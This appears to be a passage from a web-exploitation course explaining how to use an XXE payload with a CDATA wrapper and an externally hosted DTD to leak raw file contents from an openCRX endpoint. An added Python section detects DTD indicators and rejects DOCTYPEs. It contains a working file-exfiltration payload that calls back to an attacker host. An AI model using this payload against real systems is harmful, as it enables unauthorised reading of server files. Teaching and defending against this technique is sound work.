Advanced file access with CDATA
We initially discuss XML External Entity (XXE) exploits in XML External Entities, Retrieving Files; however, the examples provided there don't account for whether the content we're trying to leak is valid XML. The XML parser parses the contents of the leaked file as markup, which likely causes it to halt processing of our data prematurely.
Using a CDATA section, we can instruct the XML parser not to parse markup within our data and simply give us the raw contents of the referenced file. Here's an example XXE payload:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file://{FILEPATH}" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://{LHOST}:{LPORT}/wrapper.dtd" >
%dtd;
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&wrapper;</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>

In the above example, we define the start entity to be the opening of a CDATA section. We specify which file we want to leak with the file entity. Finally, we close the CDATA section with the end entity. How do we end up combining these elements?
We host a Document Type Definition (DTD) and reference it as an external entity. This external DTD combines the start, file, and end entities into one final entity, wrapper. We invoke the dtd entity, causing the victim host's XML parser to download the wrapper.dtd file from our attacker host. The contents of the wrapper.dtd payload are provided below:
<!ENTITY wrapper "%start;%file;%end;">

Once the victim host successfully downloads the wrapper.dtd file, we invoke the wrapper entity, causing the victim host to retrieve the file specified by the file entity and place it inside our CDATA section, so it is returned verbatim without being parsed as XML.
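From the defender's side, the payload above is only possible because the endpoint accepts a DOCTYPE (the sole place where entities can be declared). The following added example, not part of the original page, shows two controls using only Python's standard library: a lightweight indicator check that flags the DTD constructs this technique relies on (parameter entities, SYSTEM references, a CDATA marker inside an entity value), and an expat-based parser for the Contact document that rejects any DOCTYPE outright. The sample documents are constructed here and reuse the page's {FILEPATH}/{LHOST}/{LPORT} placeholders.

```python
import re
import xml.parsers.expat as expat
from typing import Dict, List

# Constructed sample: the CDATA-wrapping XXE payload from the page (placeholders left in).
XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file://{FILEPATH}" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://{LHOST}:{LPORT}/wrapper.dtd" >
%dtd;
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&wrapper;</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>"""

# Constructed sample: a legitimate Contact document with no DTD at all.
BENIGN = b"""<?xml version="1.0"?>
<org.opencrx.kernel.account1.Contact>
<lastName>Smith</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>"""

# Regexes for the DTD features this payload depends on (detection signal, not a parser).
DTD_INDICATORS = {
    "doctype": re.compile(rb"<!DOCTYPE", re.I),
    "parameter_entity": re.compile(rb"<!ENTITY\s+%", re.I),
    "external_entity": re.compile(rb"<!ENTITY[^>]*\b(SYSTEM|PUBLIC)\b", re.I),
    "cdata_in_entity": re.compile(rb'<!ENTITY[^>]*"<!\[CDATA\['),
}

class UnsafeXMLError(ValueError):
    """Raised when a document declares a DTD, which a Contact upload never needs."""

def xxe_indicators(doc: bytes) -> List[str]:
    """Return the names of XXE-related DTD constructs present in the raw document."""
    return [name for name, rx in DTD_INDICATORS.items() if rx.search(doc)]

def parse_contact(doc: bytes) -> Dict[str, str]:
    """Parse a Contact document into {tag: text}, refusing any DOCTYPE before the
    internal subset (and thus any %dtd; fetch) can be processed."""
    parser = expat.ParserCreate()
    fields: Dict[str, str] = {}
    open_tags: List[str] = []
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE '{name}' rejected: DTDs are not accepted")
    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = lambda *args: 0  # defence in depth: never fetch
    parser.StartElementHandler = lambda tag, attrs: open_tags.append(tag)
    parser.EndElementHandler = lambda tag: open_tags.pop()
    parser.CharacterDataHandler = lambda data: fields.__setitem__(
        open_tags[-1], fields.get(open_tags[-1], "") + data)
    parser.Parse(doc, True)  # exceptions raised in handlers propagate from here
    return {k: v.strip() for k, v in fields.items() if v.strip()}
```

Rejecting the DOCTYPE is the control that matters; the indicator list is useful for logging what an attacker tried, since requests carrying parameter entities or SYSTEM identifiers have no legitimate reason to reach this endpoint.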